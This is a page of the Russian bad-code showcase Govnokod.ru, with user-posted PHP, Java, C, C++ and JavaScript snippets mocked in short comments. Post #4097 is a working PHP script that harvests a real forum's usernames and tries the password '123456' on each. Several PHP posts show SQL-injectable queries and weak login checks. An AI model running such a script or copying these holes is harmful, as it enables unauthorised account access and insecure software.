По колено в коде — Говнокод.ру

PHP / Говнокод #4101

+166

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<link rel="stylesheet" type="text/css" href="table style.css"/>
<?
@session_start();

if(!isset($_SESSION['login']))

{ echo '<div id="sulochki"  style="top:80px; position:absolute; left: 678px;"><a href="avtorizaciya.php">Вход</a></div>'; }



if(isset($_SESSION['login']))

{ echo '<div  style="top:85px; position:absolute; left: 678px;">

<form action="obrabotka avtorizaciy.php" method="post"> 

<input  type="submit" name="logout" style="color:#F93; font-size:18px" value="   Выход   "/> </form> </div>'; }

if(isset($_SESSION['login'])) {

$str=strtoupper($_SESSION['niks']); 	

echo'<div style="position:absolute;left:650; top:25; color:#FFF; font-size:21px; z-index:1">Здравствуйте '.$str.'</div>';}

?>

Содержание файла с емким названием "vhod_vuchod.php"

SunnyMagadan, 25 Августа 2010

Комментарии (17)

PHP / Говнокод #4100

+160

1
2
3
4
5
6
7
8
9

$ix=$_POST['danue'];

if(isset($_POST['danue'])){

$reyd="INSERT INTO `NOVOSTI` (`CONNTEKT`) VALUES ('{$ix}')";

$rido=mysql_query($reyd) or die ("no dannuch");

header ('location: index.php');}

SunnyMagadan, 25 Августа 2010

Комментарии (16)

Java / Говнокод #4099

+121

1
2
3
4
5
6
7
8

if ((((o-'0')|('7'-o)) >= 0) && (((n-'0')|('3'-n)) >= 0)) {
                    return (n - '0') * 64 + (m - '0') * 8 + (o - '0');
                }
                unread();
                return (n - '0') * 8 + (m - '0');
            }
            unread();
            return (n - '0');

смайлоговнокод от Chen-Lieh Huang, Alan Liu
/* @(#)Pattern.java 1.113 07/05/07
http://kickjava.com/src/java/util/regex/Pattern.java.htm
окончание серии #3976 #3975 #3940 #3998 #3999 #4007 #4054

3.14159265, 25 Августа 2010

Комментарии (12)

Си / Говнокод #4098

+139

1
2
3
4
5
6
7
8

#define MIN(i1, i2) (i1 < i2 ? i1 : i2)

int mr_word_compare(const char* r1, int s1, const char* r2, int s2)
{
    int l1 = strchr(r1, ' ') - r1;
    int l2 = strchr(r2, ' ') - r2;
    return strncmp(r1, r2, MIN(l1, l2));
}

пердложенный вариант исправления #4093 (http://govnokod.ru/4093)

vayerx, 25 Августа 2010

Комментарии (23)

PHP / Говнокод #4097

+159

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72

define(hostname, 'http://phpbbforum.ru');
$file = './txt/users_phpbb.txt';
function get_users($data)
{
preg_match_all('!">(.*?)</a></b>!', $data, $users);
return $users[1];
}

function get_num_users($data)
{
preg_match_all('!">(.*?)</a></b>!', $data, $users);
return count($users[1]);
}

function get_num_pages($data)
{
preg_match('!">(\d{1,8})</a><form action!', $data, $num_pages);
return $num_pages[1];
}

function curl_header($url)
{
$ch = curl_init ($url);
curl_setopt($ch, CURLOPT_USERAGENT, useragent);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function brut($url)
{
$data = curl_header($url);
$count = substr_count($data, 'Cookie');
if($count == 2)
return false;
else
return true;
}
function get_pages($num)
{
global $users_per_page;
for($i = 0; $i<$num; $i++)
$data .= req(hostname . '/memberlist.php?mode=posts&order=DESC&start=' . $users_per_page * $i);
return $data;
}
if(!file_exists($file))
{
$data = req(hostname.'/memberlist.php');
$users_per_page = get_num_users($data);
$num_pages = get_num_pages($data);
$pages = get_pages($num_pages);
$users = get_users($pages);
$fp = fopen($file, 'w');
$users = implode("\n", $users);
fputs($fp, $users);
fclose($fp);
}
$users = file_get_contents($file);
$users = explode("\n", $users);
$count = count($users);
$pass = '123456';
for($i = 0; $i<$count; $i++)
{
if( brut(hostname.'/login.php?username='.urlencode($users[$i])."&password=$pass") )
$good[] = $users[$i];
}
$fp = fopen("./txt/$pass.txt", 'a+');
fputs($fp, implode("\n", $good));
fclose($fp);
print_r($good);

Coder, 25 Августа 2010

Комментарии (5)

PHP / Говнокод #4096

+172

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73

<?php 

$strings = array(); 

$strings[] = "10_strings_0"; 
$strings[] = "10_strings_1x"; 
$strings[] = "10_strings_2"; 
$strings[] = "10_strings_3"; 
$strings[] = "10_strings_4x"; 
$strings[] = "10_strings_5x"; 
$strings[] = "10_strings_6"; 
$strings[] = "10_strings_7x"; 
$strings[] = "10_strings_8"; 
$strings[] = "10_strings_9"; 

// СПИСОК СТРОК ИЗ 100 СТРОК В КОТОРЫХ БУДЕТ ОСУЩЕСТВЛЯТЬСЯ ПОИСК СТРОК ИЗ СПИСКА $strings 

    for ($counter=0; $counter<100; $counter++) 
    { 
        $check_strings[] = "10_strings_".$counter; 
    } 

// Временная папка - папка со скриптом 

    // создание vbs файлов 
    for ($strings_c=0; $strings_c<sizeof($strings); $strings_c++) 
    { 
        $file = fopen($strings[$strings_c].'.vbs', 'w'); 
            fwrite($file, 'Set Program = Wscript.CreateObject("Wscript.Shell")'.PHP_EOL.'Program.Run("'.$strings[$strings_c].'.bat'.'")'.PHP_EOL.'Wscript.Quit'); 
            fclose($file); 
    } 

    // создание bat файлов 

$interpreter_root = 'C:\xampp\php\php.exe'; // путь к PHP интерпретатору 
    for ($strings_c=0; $strings_c<sizeof($strings); $strings_c++) 
    { 
        $file = fopen($strings[$strings_c].'.bat', 'w'); 
        fwrite($file, $interpreter_root.' '.$strings[$strings_c].'.php'); 
        fclose($file); 
    } 

// создание php файлов 
for ($strings_c=0; $strings_c<sizeof($strings); $strings_c++)   { 
$code = '<?php 
$string = \''.$strings[$strings_c].'\'; // строка для проверки, в каждом экземпляре своя 
    for ($counter=0; $counter<100; $counter++) 
    { 
        $check_strings[] = "10_strings_".$counter; 
    } 

    shuffle($check_strings); 

    $ok = false; 

    for ($check_strings_c=0; $check_strings_c<sizeof($check_strings); $check_strings_c++) 
    { 
        if ($string == $check_strings[$check_strings_c]) 
        { 
            $ok = true; 
            break; 
        } 
    } 

    if ($ok == true) 
    { 
        $file = fopen("'.$strings[$strings_c].'_ok.txt", "w"); 
        fclose($file); 
    } 
?>'; 

$file = fopen($strings[$strings_c].'.php', 'w'); 
fwrite($file, $code);

многопоточность на PHP

exciter, 25 Августа 2010

Комментарии (99)

PHP / Говнокод #4095

+151

01
02
03
04
05
06
07
08
09
10
11

function pro($input) { 
$input=str_replace("\0", '_', $input); 
$input=trim($input); 
$input=strtr($input,array('!'=>'&#33;','"'=>'&#34;','$'=>'&#36;','%'=>'&#37;',"'"=>"&#39;",'('=>'&#40;',')'=>'&#41;','*'=>'&#42;','+'=>'&#43;',','=>'&#44;','-'=>'&#45;','.'=>'&#46;','/'=>'&#47;',':'=>'&#58;','<'=>'&#60;','='=>'&#61;','>'=>'&#62;','?'=>'&#63;','@'=>'&#64;','['=>'&#91;','\\'=>'&#92;',']'=>'&#93;','^'=>'&#94;','_'=>'&#95;','`'=>'&#96;','{'=>'&#123;','|'=>'&#124;','}'=>'&#125;','~'=>'&#126;')); 
return $input; 
} 

function depro($input) { 
$input=strtr($input,array('&#33;'=>'!','&#34;'=>'"','&#36;'=>'$','&#37;'=>'%',"&#39;"=>"'",'&#40;'=>'(','&#41;'=>')','&#42;'=>'*','&#43;'=>'+','&#44;'=>',','&#45;'=>'-','&#46;'=>'.','&#47;'=>'/','&#58;'=>':','&#60;'=>'<','&#61;'=>'=','&#62;'=>'>','&#63;'=>'?','&#64;'=>'@','&#91;'=>'[','&#92;'=>'\\','&#93;'=>']','&#94;'=>'^','&#95;'=>'_','&#96;'=>'`','&#123;'=>'{','&#124;'=>'|','&#125;'=>'}','&#126;'=>'~')); 
return $input; 
}

во всяком случае аффтар считает что это действительно защита не в рот ибацца, anti sql inj.. это вам не это.

GoodTalkBot, 24 Августа 2010

Комментарии (76)

PHP / Говнокод #4094

+160

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19

if( isset( $_POST['username'] ) && $_POST['username'] != '' ) {
		$username = $_POST['username'];
		$password = $_POST['password'];

		
		$rs = mysql_query( "select * from admin" );
		$row = mysql_fetch_array( $rs ) ;
		
		//echo "$username == $row[username] && $password == $row[password]";

		if( $username == $row['username'] && $password == $row['password']) 
		{
			session_register( 'ADMIN_NAME' );
			$_SESSION['ADMIN_NAME'] = $row['name'];
			 header( "Location: home.php" );
			exit;
		} else
			$err = "Your Username and Password is invalid";
	}

Это же просто песня! К слову: сайт был написан румынскими кодерами чуть больше года назад.

Alecfyz, 24 Августа 2010

Комментарии (20)

C++ / Говнокод #4093

+169

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17

int mr_word_compare(const char* r1, int s1, const char* r2, int s2)
{
   char* p1 = (char*)r1;
   char* p2 = (char*)r2;
   while (*p1 != ' ')
      ++ p1;
   *p1 = '\0';
   while (*p2 != ' ')
      ++ p2;
   *p2 = '\0';

   int res = strcmp(r1, r2);
   *p1 = ' ';
   *p2 = ' ';

   return res;
}

vayerx, 24 Августа 2010

Комментарии (12)

JavaScript / Говнокод #4092

+164

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19

var modo_sac = 0;
function buscar_sacapuntas(modo){
	try {
		if(modo!=null || modo!='undefined')
			modo_sac = modo;
		cn_sac = crearXMLHttpRequest();
		var cad_x = encodeURIComponent(null)
		cn_sac.onreadystatechange = procesar_sacapuntas;
		cn_sac.open("POST","extranet/portal/xml/xml_publicos/xml_sacapunta.xml",true);
		cn_sac.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
		cn_sac.send(cad_x);
	}catch(exception) {
		if(exception.description == null){
			alert("ExcepciУГn a: " + exception.message);  
		}else{
			alert("ExcepciУГn a: " + exception.description);
		}//end if
	}//end try
}//end function

немного о том, как говнокодит Уго Чавэс в Венесуэле:)
http://www.opsu.gob.ve/js/js_index.js
см. строку 4 (венесуэльное условие) и 7 (венесуэльный encodeURIComponent)

Alfred, 24 Августа 2010

Комментарии (9)

Говнокод: по колено в коде.